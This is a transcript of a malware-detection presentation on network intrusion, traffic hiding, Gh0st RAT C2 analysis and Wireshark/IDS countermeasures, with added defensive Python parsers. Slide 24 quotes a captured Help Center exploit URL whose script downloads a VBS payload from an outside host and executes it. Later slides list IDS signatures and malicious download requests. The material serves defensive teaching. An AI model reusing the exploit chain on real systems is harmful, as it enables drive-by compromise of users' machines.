  • 24. How malware enters your network An Intel company hcp://services/search?query=anything&topic=hcp://system/sysinf o/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u0 03fsvr=<script defer>eval(Run(String.fromCharCode (cmd /c echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP") :.open "GET","http://malicioushostsite.com/content/hcp_vbs.php?f=16 6::60&d=0::0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs && %TEMP%l.vbs && taskkill /F /IM helpctr.exe)))
  • 25. How malware enters your network. Info sent: browser version, operating system, Adobe version, Flash version, Java version, etc.
  • 26. How malware enters your network (excerpt of the PluginDetect fingerprinting script as captured; truncated on the slide):
      var jver = [0, 0, 0, 0], pdfver = [0, 0, 0, 0], flashver = [0, 0, 0, 0];
      try {var PluginDetect = {handler : function (c, b, a){return function (){c(b, a)}
      [………….]
      initScript:function(){var c=this,a=navigator, e="/",i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"";c.OS=100;if(b){var f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4, "iPhone",21.1,"iPod",21.2, "iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\s*PC",22.3,"
  • 27. How malware enters your network. Info gathered: browser version, operating system, Adobe version, Flash version, Java version, etc.
  • 28. How malware enters your network
  • 29. How malware enters your network: C&C server
  • 30. How malware traffic is hiding
      ► Techniques used to hide traffic:
      • Disguising malicious traffic as web traffic
      • Shortened or encoded URLs
      • IRC over http
  • 31. ► Techniques used to hide traffic:
  • 32. What goes wrong?
  • 33. Problem #1
      ► many solutions, but how to use them?
      ► education?
  • 34. Problem #2
      ► No malware strategy
      ► Focus on the end-point
      ► but what is your end-point nowadays?
  • 35. Problem #3
      ► No layered (malware) defense
      ► Traffic streams unclear
  • 36. Problem #4
      ► How does malware work?
      ► How to recognize patterns & correlate?
  • 37. So....
  • 38. Wireshark Kung-Fu
  • 39. Custom/targeted malware
      ► Some recent samples of malware:
      • spreading: shares, USB media, .exe infections
      • Search for Autocomplete information
      • Search for specific accounts
      • Keylogger
      • Created task to check if keylogger was running
      • Masked in dll files
      • Upload results to ftp servers
  • 40. Custom/targeted malware
      ► IEAutocomplete (recovered values, masked):
      Type: 89c39569 Subtype: 0xf111f3e Unknown: 89c39569: [IdentitiesPass]=[,,,,$#„#Œ]
      Type: e161255a Subtype: 0xe161255a
      IE AutoComplete: [address]=[Street ********* ,]
      IE AutoComplete: [ini_tmp]=[pa*******]
      IE AutoComplete: [name]=[p********]
      IE AutoComplete: [num]=[01*********]
      IE AutoComplete: [p0]=[******ADMIN]
      IE AutoComplete: [rech]=[SY*******]
      IE AutoComplete: [username]=[22*********]
  • 41. Custom/targeted malware
      ► As mentioned before, traffic is hidden using:
      • http(s)
      • ftp (traffic increase)
      • irc
      • Tcp 445 (traffic increase)
      • Tcp 53 (DNS)
      • Compression of traffic
      Used for downloading payload, uploading information, command & control
  • 42. Custom/targeted malware
      ► Arming for detection
  • 43. Wireshark. Which filters can be used?
      First: tcp.dstport == 80 and http contains "GET"
      After analyzing this output, fine-tune the filter: tcp.dstport == 80 and http contains "GET" and ip.dst_host == 67.2**.***.***
  • 44. Wireshark
      ► Which filters can be used? DNS queries:
      dns contains "ru" or dns contains "cn" or dns contains "biz" or dns contains "dyndns.org" or dns contains "cc"
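A `dns contains "ru"` style filter matches the two characters anywhere in the packet, so a query for true.example.com is flagged next to a query for update.example.ru. The helper below is an added example, not from the presentation: it keeps the slide's list of suffixes but compares them against the trailing labels of each query name, and sorts a set of constructed sample names into hits, substring-only noise and clean names so the two approaches can be compared.

```python
# Added example (not from the presentation): suffix matching of DNS query names
# against the suffix list used on the slide, compared with plain substring
# matching (what `dns contains "..."` does). Sample names are constructed.

SUSPECT_SUFFIXES = ("ru", "cn", "biz", "cc", "dyndns.org")  # the slide's list

# Constructed sample query names, not from a real capture
SAMPLE_QUERIES = [
    "update.example.ru.",   # trailing dot as seen in zone-file notation
    "true.example.com",     # contains "ru" but is a .com name
    "host42.dyndns.org",
    "mybizsite.com",        # contains "biz" but is a .com name
    "cdn.example.net",
    "login.example.cc",
]


def substring_match(qname):
    """Mimic the Wireshark filter: any suffix occurring anywhere in the name."""
    name = qname.lower()
    return any(s in name for s in SUSPECT_SUFFIXES)


def suffix_match(qname):
    """Return the matched suffix when the name's last labels equal it, else None."""
    labels = qname.rstrip(".").lower().split(".")
    for suffix in SUSPECT_SUFFIXES:
        parts = suffix.split(".")
        if len(labels) >= len(parts) and labels[-len(parts):] == parts:
            return suffix
    return None


def triage(queries):
    """Bucket names: 'hit' (suffix match), 'noise' (substring only), 'clean'."""
    result = {"hit": [], "noise": [], "clean": []}
    for qname in queries:
        if suffix_match(qname):
            result["hit"].append(qname)
        elif substring_match(qname):
            result["noise"].append(qname)
        else:
            result["clean"].append(qname)
    return result


if __name__ == "__main__":
    for bucket, names in triage(SAMPLE_QUERIES).items():
        print(bucket, names)
```

The `noise` bucket is exactly the set of names the display filter would show but the suffix check would not; running the filter first and this triage second keeps the Wireshark output short without losing the real hits.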
  • 45. T-shark
      ► T-shark: command line:
  • 46. Wireshark
      ► Example of Morto:
  • 47. Custom/targeted malware
      ► Chinese Gh0st RAT
      • Full analysis by Foundstone’s Michael G. Spohn
      • example of Chinese RAT used in several campaigns
      • research project to understand how it works
  • 48. Custom/targeted malware
      ► Chinese Gh0st RAT
  • 49. Custom/targeted malware
      ► Network analysis of Chinese Gh0st RAT
      • Command & Control (C2) packets consist of:
        1. A five byte packet header that contains the characters ‘Gh0st’.
        2. A four byte integer that contains the size in bytes of the entire packet.
        3. A four byte integer that contains the size in bytes of the entire packet when uncompressed.
        4. A variable sized packet that contains the packet payload.
      The client sends small requests that contain commands, and the server responds to those commands with the requested data.
  • 50. Custom/targeted malware
      ► example of commands
      • 50 commands used
  • 51. Custom/targeted malware
      ► example of token codes
      • Used by server to identify payloads to client
  • 52. Custom/targeted malware
      ► example of login packet
  • 53. Custom/targeted malware
      ► uncompressing the login payload: First byte 66 (0x66 = 102)
  • 54. Custom/targeted malware
      ► lookup 102 in RAT’s command value table:
  • 55. Custom/targeted malware
      ► uncompressing the login payload: C0 A8 01 E0 = 192.168.1.249 (host ip-address)
  • 56. Custom/targeted malware
      ► uncompressing the login payload: ’01’ – in this case means a webcam is present on client
  • 57. Custom/targeted malware
      ► For the RE die-hards: Gh0st RAT LoginInfo structure
  • 58. Wireshark filter
      ► Chinese Gh0st RAT - filter: "\x47\x68\x30\x73\x74" (the bytes of "Gh0st")
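The framing on slides 49 to 58 (five byte "Gh0st" marker, two four byte sizes, zlib-compressed payload, login token 0x66, IPv4 address and webcam flag in the decompressed login payload) is enough to write a small detector for a reassembled TCP stream. The code below is an added example, not the presentation's or Michael Spohn's code: it assumes the two size fields are little-endian, and the layout it uses for the login payload (token byte, IPv4 address, webcam flag, NUL-padded host name) is a simplified assumption for the example rather than the RAT's real LoginInfo structure. The sample stream and host values are constructed.

```python
import socket
import struct
import zlib

# Added example (not from the presentation): parser for the Gh0st C2 framing
# described on the slides. ASSUMPTIONS: little-endian sizes, and a simplified
# login payload layout (token, IPv4, webcam flag, 50-byte host name).

MAGIC = b"Gh0st"          # five byte header; the bytes the "Gh0st" Wireshark filter looks for
HEADER_LEN = 5 + 4 + 4    # magic + total size + uncompressed size
TOKEN_LOGIN = 0x66        # 102: first byte of the decompressed login payload
HOSTNAME_LEN = 50         # assumed fixed-size field in the simplified layout


def build_frame(payload):
    """Wrap a plaintext payload in a Gh0st frame (used here to construct samples)."""
    body = zlib.compress(payload)
    total = HEADER_LEN + len(body)
    return MAGIC + struct.pack("<II", total, len(payload)) + body


def parse_frame(data):
    """Parse one frame at the start of data.

    Returns (payload, bytes_consumed); None when the magic is missing or the frame
    is not complete yet (a segment boundary inside the frame). Raises ValueError
    when the decompressed length disagrees with the header.
    """
    if len(data) < HEADER_LEN or data[:5] != MAGIC:
        return None
    total, uncompressed = struct.unpack_from("<II", data, 5)
    if total < HEADER_LEN or total > len(data):
        return None
    payload = zlib.decompress(data[HEADER_LEN:total])
    if len(payload) != uncompressed:
        raise ValueError("payload is %d bytes, header says %d" % (len(payload), uncompressed))
    return payload, total


def find_frames(stream):
    """Scan a reassembled stream for Gh0st frames, skipping unrelated bytes."""
    frames = []
    pos = stream.find(MAGIC)
    while pos != -1:
        parsed = parse_frame(stream[pos:])
        if parsed is None:                      # truncated: look for the next marker
            pos = stream.find(MAGIC, pos + 1)
            continue
        payload, consumed = parsed
        frames.append(payload)
        pos = stream.find(MAGIC, pos + consumed)
    return frames


def parse_login(payload):
    """Decode the assumed login layout; None when the token is not the login token."""
    if len(payload) < 1 + 4 + 1 + HOSTNAME_LEN or payload[0] != TOKEN_LOGIN:
        return None
    hostname = payload[6:6 + HOSTNAME_LEN].split(b"\x00", 1)[0]
    return {
        "token": payload[0],
        "ip": socket.inet_ntoa(payload[1:5]),   # four raw bytes, as on slide 55
        "webcam": payload[5] == 1,              # 0x01 = webcam present, as on slide 56
        "hostname": hostname.decode("ascii", "replace"),
    }


# Constructed sample login from a lab host with a webcam present
SAMPLE_LOGIN = (
    bytes([TOKEN_LOGIN])
    + socket.inet_aton("10.0.0.5")
    + b"\x01"
    + b"LAB-WS01".ljust(HOSTNAME_LEN, b"\x00")
)

# Constructed stream: unrelated bytes, two complete frames, then a truncated frame
SAMPLE_STREAM = (
    b"GET / HTTP/1.1\r\n\r\n"
    + build_frame(SAMPLE_LOGIN)
    + build_frame(b"\x01keepalive")
    + build_frame(b"\x02" + b"A" * 200)[:16]
)

if __name__ == "__main__":
    for payload in find_frames(SAMPLE_STREAM):
        print("token 0x%02x" % payload[0], parse_login(payload))
```

`find_frames` is the programmatic counterpart of the `"\x47\x68\x30\x73\x74"` filter: it locates the marker, then validates the size fields and decompresses, so a stray "Gh0st" string in unrelated traffic is dropped instead of reported.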
  • 59. Wireshark
      ► NETBIOS traffic
  • 60. Wireshark
      ► Traffic regarding TCP 445 (shares, SMB). Incoming file share access attempts:
      ((smb.cmd && ip.dst > internal network address) || (smb.cmd && ip.dst < internal network broadcast address))
  • 61. Wireshark
      ► SMB worm creating .exe on share:
      smb.create.action == 2 and smb.file contains "exe"
  • 62. Wireshark
      ► SMB .exe detection. In the old days: smb.file contains "exe"
  • 63. Wireshark
      ► SMB .exe detection: Taddong developed a tool to capture SMB file transfers in Wireshark. But… good news: it’s now integrated in Wireshark version 1.5.1 (Dev)
  • 64. Wireshark
      ► SMB .exe detection: File > Export > Objects > SMB
  • 65. Wireshark
      ► SMB .exe detection:
  • 66. Wireshark: DEMO
  • 68. Training & Education!!!!!
  • 69. Countermeasures
  • 70. Countermeasures
      ► Implement IDS rules to monitor/report RDP and VNC protocol use (particularly from the internet):
      RDP = "|43 6f 6f 6b 69 65 3a 20 6d 73 74 73 68 61 73 68|"
      TPKT (RDP) = "|03 00 00 0b 06 e0|"; "|b8 e5 0d 3d 16 00|"
      VNC = "|52 46 42 20 30 30 33 2e 30 30|"
  • 71. Countermeasures
      ► Implement IDS rules to monitor for CMD shell usage over the network from the internet or across firewalls:
      CMD = "|0a 0a|C|3a 5c|"; "|0a 0a|C|3a 5c|WINDOWS|5c|";
      ► Implement new signatures in IDS/DLP as they are learned
  • 72. Countermeasures
      ► Detect services on non-standard ports
      ► Nmap the internal network: nmap -sS -p <ports> -oG results.nmap <IP or subnet range>
  • 73. Countermeasures
      ► Detect services on non-standard ports
      ► Probe discovered ports with Amap: amap -A -b -o out.amap <IP> <port> <port> ... or use the results.nmap file as input
  • 74. Countermeasures
      ► Implement IDS/HIPS/DLP rules to detect outbound GET requests for files by type (.exe, .bat, .dll etc.) in the URL:
      GET http://scan28.dosmokes.ce.ms/InstallSystemDefender_133.bin HTTP/1.0
      GET http://webmoviefiles.in/DownloaderThe.Queen.of.Fighters.45094.exe HTTP/1.1
  • 75. Countermeasures
      ► Implement IDS/HIPS/DLP rules to detect encoded URL extensions:
      GET http://220407db0435.thoseros.com/get2.php?c=PXWSQSZT&d=26606B67393230312E64636F317E3E3D2120222724243078747D456E7579232843471710111510015D404E166E6F1F6C06740A00050701750C787B7A0504080876787777777377707C0C0C0E6A2F27212634206E656D637130303E66386B3F6E575003534204020A55584C041F1B0B1D4D442D42522A021413444A4B4E4E4F4FB7B8B2B5A2F5F4E8EBB4CFF3FCE1E1FDF5E3BCD6CCD0B0FBFCA8C5FEA1ADB8FCCCCFD6FCC1989781DF9F9E969C8BCDC1D4DD8FE6E7858686FCFBFB8DFE888D8AF5EFA3AEEAB6A9A9B1E7A9A4A1EBA7ABB1A5B7EEE5E6E6E6EFEBEDEBEAE8F89AAFB3 HTTP/1.1
  • 76. Countermeasures
      ► Implement IDS/HIPS/DLP rules to detect MIME/Base64-encoded URL extensions:
      GET http://65.75.156.141/Home/d.php?f=16&e=about.exe HTTP/1.1
      GET http://65.75.156.141/Home/d.php?f=MTYmZT1hYm91dC5leGU== HTTP/1.1
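Slides 74 to 76 describe three patterns in outbound GET requests worth a rule: an executable file type in the URL, a long hex-encoded query value, and a Base64-encoded query value that hides the same file name. The triage function below is an added example, not code from the presentation: it applies all three checks to HTTP request lines, decodes Base64 leniently (the slide's sample carries one `=` more than the value needs, which strict decoders reject) and reports what the decoded value contains. Hosts, paths and the hex value are constructed for the example; the Base64 value is the one on the slide.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# Added example (not from the presentation): triage of outbound GET request
# lines for executable file types, hex-encoded and Base64-encoded query values.
# Hosts and most values below are constructed; the Base64 sample is the slide's.

SUSPECT_EXT = (".exe", ".bat", ".dll", ".bin")          # file types named on the slides
HEX_VALUE = re.compile(r"^[0-9A-Fa-f]{32,}$")          # long, hex-only query value
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,3}$")  # Base64 alphabet, any padding


def decode_base64_lenient(value):
    """Decode Base64 while tolerating missing or excess '=' padding; None if invalid."""
    stripped = value.rstrip("=")
    padded = stripped + "=" * (-len(stripped) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_request(request_line):
    """Return the findings for one HTTP request line (empty list when nothing matched)."""
    method, url, _version = request_line.split(" ", 2)
    findings = []
    if method != "GET":
        return findings
    parts = urlsplit(url)
    if parts.path.lower().endswith(SUSPECT_EXT):
        findings.append("executable-in-path")
    # Split the query by hand: parse_qsl would turn '+' into a space and break Base64.
    for pair in filter(None, parts.query.split("&")):
        key, _sep, value = pair.partition("=")
        if HEX_VALUE.match(value):
            findings.append("hex-encoded:" + key)
            continue
        if B64_VALUE.match(value):
            decoded = decode_base64_lenient(value)
            if decoded is not None and decoded.isascii() and decoded.decode().isprintable():
                text = decoded.decode()
                findings.append("base64-encoded:%s=%s" % (key, text))
                if any(ext in text.lower() for ext in SUSPECT_EXT):
                    findings.append("executable-in-decoded-query:" + key)
                continue
        if value.lower().endswith(SUSPECT_EXT):
            findings.append("executable-in-query:" + key)
    return findings


def triage(request_lines):
    """Return (line, findings) for every request line that produced a finding."""
    report = []
    for line in request_lines:
        found = classify_request(line)
        if found:
            report.append((line, found))
    return report


# Constructed request lines in the shape shown on the slides
SAMPLE_REQUESTS = [
    "GET http://www.example.com/index.html?id=42 HTTP/1.1",
    "GET http://dl.example.invalid/InstallSystemDefender_133.bin HTTP/1.0",
    "GET http://c2.example.invalid/get2.php?c=PXWSQSZT&d=" + "A1B2C3D4" * 8 + " HTTP/1.1",
    "GET http://c2.example.invalid/Home/d.php?f=16&e=about.exe HTTP/1.1",
    "GET http://c2.example.invalid/Home/d.php?f=MTYmZT1hYm91dC5leGU== HTTP/1.1",
]

if __name__ == "__main__":
    for line, found in triage(SAMPLE_REQUESTS):
        print(found, "<-", line)
```

The Base64 branch only reports values that decode to printable ASCII, which keeps ordinary long tokens (session ids, tracking parameters) out of the report; the decoded text is included in the finding so the analyst sees the hidden `e=about.exe` without a second tool.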
  • 77. Wrap up
      ► What have you learned?
      • the game has changed
      • malware uses all kinds of ways to hide itself
      • Many tools to detect malware
      • but….
      • invest in learning the tools and how malware works
      • define a defense-in-depth malware strategy
      • create awareness
      • educate administrators AND management AND users
  • 78. Resources & credits
      ► Resources
      • Wireshark (http://www.wireshark.org)
      • Snort (http://www.sourcefire.com)
      • Nmap (http://www.insecure.org)
      • Amap (http://www.thc.org/thc-amap/)
      ► Special thanks to
      • Michael G. Spohn
      • Shane Shook
      • Tony Lee
      • Carric Dooley
  • 79. Shukran/Thank you!
      ► Keep in touch: Christiaan_Beek @McAfee dot com
      ► Twitter: @FSEMEA, @Foundstone, @ChristaanBeek